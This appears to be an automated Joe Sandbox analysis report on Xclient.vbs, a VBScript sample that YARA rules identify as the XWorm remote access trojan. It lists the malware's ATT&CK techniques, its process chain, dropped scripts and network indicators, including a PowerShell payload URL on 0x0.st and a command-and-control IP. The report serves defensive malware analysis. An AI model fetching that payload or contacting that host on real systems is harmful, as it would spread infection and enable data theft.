                Source: Yara matchFile source: 28.2.powershell.exe.206008ed970.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa248728.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133ad9a0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2eb440.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7e4bb0000.16.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133975c0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07127e40.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.00000206008C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2325412269.000001D313377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CE2B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CE2E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1969459274.000001D7E4BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2248750195.000002CC070F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CCDB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2720, type: MEMORYSTR
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected XWorm
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133b65d0.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa26a4b0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc0714a0b0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa26a4b0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601de4450.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008ed970.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07141480.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa248728.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07127e40.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008f65a0.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601dfa830.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc0714a0b0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601dfa830.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2d5060.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccde7168.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601de4450.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7e4bb0000.16.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2eb440.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa261880.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008f65a0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa261880.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccdde538.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008ed970.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa248728.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133ad9a0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2eb440.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7e4bb0000.16.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133975c0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07141480.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07127e40.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.00000206008C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2325412269.000001D313377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CE2B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CE2E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2325412269.000001D3133AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1969459274.000001D7E4BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2074612069.000001E1AA261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2325412269.000001D312D1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2248750195.000002CC070F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CCDB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2248750195.000002CC07141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7456, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7900, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3152, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7312, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2720, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected XWorm
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133b65d0.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa26a4b0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc0714a0b0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa26a4b0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601de4450.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008ed970.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07141480.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa248728.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07127e40.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008f65a0.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601dfa830.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc0714a0b0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601dfa830.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2d5060.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccde7168.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601de4450.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7e4bb0000.16.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2eb440.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa261880.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008f65a0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa261880.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccdde538.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008ed970.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa248728.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133ad9a0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2eb440.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7e4bb0000.16.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133975c0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07141480.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07127e40.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.00000206008C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2325412269.000001D313377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CE2B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CE2E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2325412269.000001D3133AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1969459274.000001D7E4BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2074612069.000001E1AA261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2325412269.000001D312D1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2248750195.000002CC070F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CCDB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2248750195.000002CC07141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7456, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7900, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3152, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7312, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2720, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information222
                Scripting                		Valid Accounts12
                Windows Management Instrumentation                		222
                Scripting                		1
                LSASS Driver                		1
                Deobfuscate/Decode Files or Information                		OS Credential Dumping2
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API                		1
                LSASS Driver                		1
                DLL Side-Loading                		13
                Obfuscated Files or Information                		LSASS Memory34
                System Information Discovery                		Remote Desktop Protocol1
                Screen Capture                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution                		1
                DLL Side-Loading                		11
                Process Injection                		3
                Software Packing                		Security Account Manager541
                Security Software Discovery                		SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Command and Scripting Interpreter                		1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		1
                DLL Side-Loading                		NTDS1
                Process Discovery                		Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts1
                Scheduled Task/Job                		1
                Office Application Startup                		2
                Registry Run Keys / Startup Folder                		11
                Masquerading                		LSA Secrets251
                Virtualization/Sandbox Evasion                		SSHKeylogging113
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable Media3
                PowerShell                		2
                Registry Run Keys / Startup Folder                		RC Scripts1
                Modify Registry                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items251
                Virtualization/Sandbox Evasion                		DCSync1
                System Network Configuration Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                Process Injection                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1615978 Sample: Xclient.vbs Startdate: 15/02/2025 Architecture: WINDOWS Score: 100 72 ip-api.com 2->72 74 api.msn.com 2->74 76 3 other IPs or domains 2->76 86 Suricata IDS alerts for network traffic 2->86 88 Found malware configuration 2->88 90 Malicious sample detected (through community Yara rule) 2->90 92 17 other signatures 2->92 10 wscript.exe 2 2->10         started        14 cmd.exe 1 2->14         started        16 cmd.exe 1 2->16         started        18 16 other processes 2->18 signatures3 process4 dnsIp5 68 C:\Users\user\AppData\...\bYKR19crJ6p8904.bat, ASCII 10->68 dropped 104 VBScript performs obfuscated calls to suspicious functions 10->104 106 Wscript starts Powershell (via cmd or directly) 10->106 108 Windows Scripting host queries suspicious COM object (likely to drop second stage) 10->108 110 Suspicious execution chain found 10->110 21 cmd.exe 1 10->21         started        24 cmd.exe 1 14->24         started        38 4 other processes 14->38 26 cmd.exe 1 16->26         started        28 conhost.exe 16->28         started        78 127.0.0.1 unknown unknown 18->78 30 cmd.exe 1 18->30         started        32 cmd.exe 1 18->32         started        34 conhost.exe 18->34         started        36 conhost.exe 18->36         started        file6 signatures7 process8 signatures9 94 Suspicious powershell command line found 21->94 96 Wscript starts Powershell (via cmd or directly) 21->96 98 Bypasses PowerShell execution policy 21->98 40 cmd.exe 2 21->40         started        43 conhost.exe 21->43         started        45 conhost.exe 24->45         started        47 powershell.exe 24->47         started        49 conhost.exe 26->49         started        51 powershell.exe 26->51         started        57 2 other processes 30->57 53 conhost.exe 32->53         started        55 powershell.exe 32->55         started        process10 signatures11 100 Suspicious powershell command line found 40->100 102 Wscript starts Powershell (via cmd or directly) 40->102 59 powershell.exe 15 17 40->59         started        64 conhost.exe 40->64         started        process12 dnsIp13 80 185.241.208.215, 49736, 49741, 50051 GBTCLOUDUS Moldova Republic of 59->80 82 ip-api.com 208.95.112.1, 49735, 50050, 80 TUT-ASUS United States 59->82 84 0x0.st 168.119.145.117, 443, 49734, 49738 HETZNER-ASDE Germany 59->84 70 C:\Users\user\...\StartupScript_6dd171fd.cmd, ASCII 59->70 dropped 112 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 59->112 114 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 59->114 116 Uses shutdown.exe to shutdown or reboot the system 59->116 118 2 other signatures 59->118 66 shutdown.exe 1 59->66         started        file14 signatures15 process16

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Xclient.vbs8%VirustotalBrowse
                Xclient.vbs27%ReversingLabsScript-WScript.Backdoor.Asyncrat

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://0x0.st0%Avira URL Cloudsafe
                185.241.208.2150%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                a-0003.a-msedge.net
                		204.79.197.203
                		truefalse
                  		high
                  ip-api.com
                  		208.95.112.1
                  		truefalse
                    		high
                    0x0.st
                    		168.119.145.117
                    		truefalse
                      		high
                      api.msn.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://0x0.st/8KuV.ps1false
                          		high
                          185.241.208.215true
                          • Avira URL Cloud: safe
                          		unknown
                          http://ip-api.com/line/?fields=hostingfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://g.live.com/odclientsettings/Prod.C:svchost.exe, 0000001F.00000003.2316380909.00000286952FF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.2316380909.000002869520E000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.drfalse
                              		high
                              http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://g.live.com/odclientsettings/ProdV2svchost.exe, 0000001F.00000003.2316380909.00000286952C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.drfalse
                                  		high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2325412269.000001D3126D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 0000001F.00000003.2316380909.00000286952C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2325412269.000001D3126D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://0x0.stpowershell.exe, 00000005.00000002.2325412269.000001D313C04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CD0F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1AA55A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC07437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.0000020600C04000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://go.micropowershell.exe, 00000005.00000002.2325412269.000001D3133E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://0x0.stpowershell.exe, 00000005.00000002.2325412269.000001D313B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CCDF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CC71D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1AA4A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1A9B7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC0715A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC06A5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.000002060022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.0000020600903000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/powershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/Licensepowershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://ip-api.compowershell.exe, 00000005.00000002.2325412269.000001D3133DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2325412269.000001D312D1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2325412269.000001D3133D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/Iconpowershell.exe, 00000005.00000002.2547321212.000001D322523000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000001F.00000003.2316380909.00000286952A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.2316380909.0000028695307000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.2316380909.00000286952C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.2316380909.00000286952E8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.drfalse
                                                        		high
                                                        https://aka.ms/pscore68powershell.exe, 00000005.00000002.2325412269.000001D3124B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CC4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1A9956000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC06836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.0000020600006000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.2325412269.000001D3124B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CC4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1A9956000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC06836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2323673539.0000020600006000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000001F.00000003.2316380909.00000286952C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.31.drfalse
                                                              		high
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2325412269.000001D3126D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                208.95.112.1
                                                                		ip-api.comUnited States
                                                                		53334TUT-ASUSfalse
                                                                168.119.145.117
                                                                		0x0.stGermany
                                                                		24940HETZNER-ASDEfalse
                                                                185.241.208.215
                                                                		unknownMoldova Republic of
                                                                		26636GBTCLOUDUStrue

                                                                Private

                                                                IP
                                                                127.0.0.1

                                                                General Information

                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1615978
                                                                Start date and time:2025-02-15 20:42:20 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 10m 26s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:71
                                                                Number of new started drivers analysed:5
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Sample name:Xclient.vbs
                                                                Detection:MAL
                                                                Classification:mal100.rans.troj.spyw.expl.evad.winVBS@52/31@4/4
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 98%
                                                                • Number of executed functions: 10
                                                                • Number of non-executed functions: 2
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .vbs

                                                                Warnings

                                                                • Connection to analysis system has been lost, crash info: Unknown
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, smss.exe, dwm.exe, WMIADAP.exe, SIHClient.exe, csrss.exe, winlogon.exe, conhost.exe
